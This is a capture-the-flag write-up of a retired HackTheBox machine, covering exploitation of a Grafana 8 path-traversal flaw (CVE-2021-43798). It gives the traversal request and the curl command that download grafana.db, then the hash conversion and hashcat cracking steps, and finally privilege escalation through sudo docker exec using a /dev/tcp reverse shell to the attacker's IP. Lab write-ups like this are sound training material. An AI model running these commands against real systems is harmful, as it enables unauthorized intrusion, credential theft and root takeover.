This is a retired machine that was released on the HackTheBox platform July 1st 2025. Lets give it a crack.

It involves exploiting Grafana via LFI to get a database file that we can extract hashes from. With these hashes we convert and crack them to obtain user access to our target machine. After this, we are able to abuse docker exec to gain root access.

https://app.hackthebox.com/machines/673/writeups

Enumeration

Target IP: 10.129.64.73 Attacker IP: 10.10.14.92

nmap -sCVS 10.129.64.73 -oA data

22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 63:47:0a:81:ad:0f:78:07:46:4b:15:52:4a:4d:1e:39 (RSA)
|   256 7d:a9:ac:fa:01:e8:dd:09:90:40:48:ec:dd:f3:08:be (ECDSA)
|_  256 91:33:2d:1a:81:87:1a:84:d3:b9:0b:23:23:3d:19:4b (ED25519)
3000/tcp open  http    Grafana http
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Grafana
|_Requested resource was /login
| http-robots.txt: 1 disallowed entry 
|_/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 3000 looks interesting. I open a web browser and head over to check it out.

http://10.129.64.73:3000

\

From the home page we can see that Grafana is running version 8.

We try to log in with default credentials, admin:admin

After doing some research for exploits on Grafana v8, we find one that we can attempt to use: https://www.exploit-db.com/exploits/50581

This directory traversal / arbitrary file read may allow us to read the credentials file so that we may login to Grafana (or maybe we can even gather some more useful credentials and or keys?)

https://grafana.com/docs/grafana/latest/setup-grafana/configure-grafana/

The Grafana documenation lets us know where to look for these credentials

CVE: 2021-43798

Taking a look at the script we got from ExploitDB, it looks like this is a basic LFI traversal. Lets try to manually exploit this first. url = args.host + '/public/plugins/' + choice(plugin_list) + '/../../../../../../../../../../../../..' + file_to_read

We intercept a request and edit our GET request to traverse and capture the /etc/passwd on the target machine. This request is successful!

Lets attempt to grab the Grafana.db file to get our login credentials for Grafana.

Here is our new GET request for this GET /public/plugins/welcome/../../../../../../../../../../../../var/lib/grafana/grafana.db HTTP/1.1

While looking through our response we find that we have two users, admin and boris.

It is going to be hard to look through the database in Burp Suite, lets download this file onto our attacker machine so we can extract information in a digestible format.

curl --path-as-is "http://10.129.64.73:3000/public/plugins/welcome/../../../../../../../../../../../../var/lib/grafana/grafana.db" --output grafana.db

Credential Extraction

We open the database file via SQLite and view the data inside of the user table.

We find a hash along with a salt!

I save the hash along with the salt in a text file in this format

salt,hash

I try to run Hashcat on the text file boris but it appears that Hashcat can’t determine the structure of the input hash.

Grafana uses the PBKDF2_HMAC_SHA256 algorithm to hash user passwords. It then stores the hash digests in hexadecimal with the salt values being in a plaintext format. We need to convert the hash digest into a format that Hashcat can use.

We find this Github repo which has a tool that can help us convert the hash into a Hashcat friendly format. https://github.com/iamaldi/grafana2hashcat

python grafana2hashcat.py -o borisconvert ~/Desktop/data/boris

Lets run Hashcat on our converted hashes!

hashcat -m 10900 (borishash) (wordlist)

We are able to extract the credentials for boris

ssh [email protected]

We try the credentials to access the server using the boris user account and we are able to enter! From here we can grab our user flag.

Privilege Escalation

I will run linpeas in the background while preforming some manual enumeration of the machine.

Upon running sudo -l we are able to see that boris has interesting permissions on what he can run

It looks like we need a container to target for docker exec

Lets look for some containers ps aux | grep 'docker'

root      1543  0.0  0.4 711712  8972 ?        Sl   14:05   0:00 /snap/docker/1125/bin/containerd-shim-runc-v2 -namespace moby -id e6ff5b1cbc85cdb2157879161e42a08c1062da655f5a6b7e24488342339d4b81 -address /run/snap.docker/containerd/containerd.sock

We find a container that we can target

sudo docker exec --interactive --privileged --user root e6ff5b1cbc85cdb2157879161e42a08c1062da655f5a6b7e24488342339d4b81 whoami

We get an output!

Lets see if we can get a reverse shell going

We set up a listener on our attacking machine https://github.com/brightio/penelope penelope -i 10.10.14.92 4444

Here is our reverse shell line, you can edit this with your own IP and port /bin/sh -i >& /dev/tcp/(ip)/(port) 0>&1`

sudo docker exec --interactive --privileged --user root e6ff5b1cbc85cdb2157879161e42a08c1062da655f5a6b7e24488342339d4b81 /bin/sh -i >& /dev/tcp/10.10.14.92/4444 0>&1

Where is our root flag?!

As root lets mount sda1 to get our flag

mount /dev/sda1 /mnt/

From there we are able to view our root flag! pwned